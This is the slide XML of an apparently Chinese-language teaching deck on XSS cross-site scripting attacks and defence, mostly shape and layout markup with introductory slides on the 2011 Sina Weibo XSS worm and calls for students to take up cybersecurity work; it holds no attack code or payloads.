                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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84" name="Freeform 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11063605" y="728980"/>
            <a:ext cx="389255" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="389254" h="439419">
                <a:moveTo>
                  <a:pt x="388747" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373252" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388747"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85" name="Freeform 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662676" y="1976501"/>
            <a:ext cx="883919" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="883919" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="883920" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="3C7CB3">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="AutoShape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591425" y="257175"/>
            <a:ext cx="3686175" cy="542925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId5">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7" name="TextBox 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2286000"/>
            <a:ext cx="8526145" cy="2092325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>十</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>XSS跨站脚本攻击与防护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>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AutoShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742370" y="1671584"/>
            <a:ext cx="607819" cy="607819"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870713" y="1799928"/>
            <a:ext cx="351132" cy="351132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046279" y="2279404"/>
            <a:ext cx="0" cy="831102"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742370" y="3622548"/>
            <a:ext cx="607819" cy="607819"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870713" y="3750892"/>
            <a:ext cx="351132" cy="351132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046279" y="4230367"/>
            <a:ext cx="0" cy="831102"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6058213" y="1671584"/>
            <a:ext cx="607819" cy="607819"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186557" y="1799928"/>
            <a:ext cx="351132" cy="351132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362122" y="2279404"/>
            <a:ext cx="0" cy="831102"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6058213" y="3622548"/>
            <a:ext cx="607819" cy="607819"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186557" y="3750892"/>
            <a:ext cx="351132" cy="351132"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362122" y="4230367"/>
            <a:ext cx="0" cy="831102"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500099" y="1567068"/>
            <a:ext cx="4305300" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120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XSS蠕虫来袭</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8" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499870" y="2097405"/>
            <a:ext cx="3983990" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2011年6月28日晚，新浪微博遭受到XSS蠕虫攻击侵袭，在不到一个小时的时间，超过3万微博用户受到该XSS蠕虫的攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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9" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1506449" y="3581532"/>
            <a:ext cx="4552950" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120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网络安全警钟</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20" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499870" y="4048760"/>
            <a:ext cx="3983990" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS蠕虫攻击事件虽未直接窃取用户信息，但警示病毒木马已瞄准社交网络漏洞，敲响网络安全警钟，安全防线亟待加固。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6901147" y="3578357"/>
            <a:ext cx="4524375" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120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青年网安担当</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22" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894195" y="4048760"/>
            <a:ext cx="3983990" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>作为新时代青年学生，面对网信安全挑战，应主动作为，学习专业技能，为加快建设网络强国、数字中国贡献力量。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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23" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6967612" y="1567068"/>
            <a:ext cx="4457700" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120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网信安全铜壁</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24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6967855" y="2097405"/>
            <a:ext cx="3983990" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>党的二十大报告强调安全为前提，要求筑牢网信安全防线；当前，网信安全影响国家安全与人民利益，需树立总体网络安全观。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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25" name="TextBox 25"/>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网信安全警钟</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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3657600"/>
            <a:ext cx="2880360" cy="1718945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="114300" tIns="57150" rIns="114300" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>青年学生作为网络世界的重要力量，应当承担起维护网络安全的重任，将网络安全视为己任。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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6" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-245556" y="3339475"/>
            <a:ext cx="4305300" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="114300" tIns="57150" rIns="114300" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="77000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>新时代网安使命</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" b="1">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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733608" y="3322302"/>
            <a:ext cx="4305300" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="114300" tIns="57150" rIns="114300" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="77000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>技能强网安防线</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" b="1">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8" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620278" y="3276582"/>
            <a:ext cx="4305300" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="114300" tIns="57150" rIns="114300" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="77000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1725" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>贡献筑网安未来</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725" b="1">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9" name="AutoShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247296" y="1658382"/>
            <a:ext cx="1161288" cy="1161288"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="236696">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314515" y="1658382"/>
            <a:ext cx="1161288" cy="1161288"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9107715" y="1658382"/>
            <a:ext cx="1161288" cy="1161288"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5519756" y="1930842"/>
            <a:ext cx="616369" cy="616369"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="304800" h="304800">
                <a:moveTo>
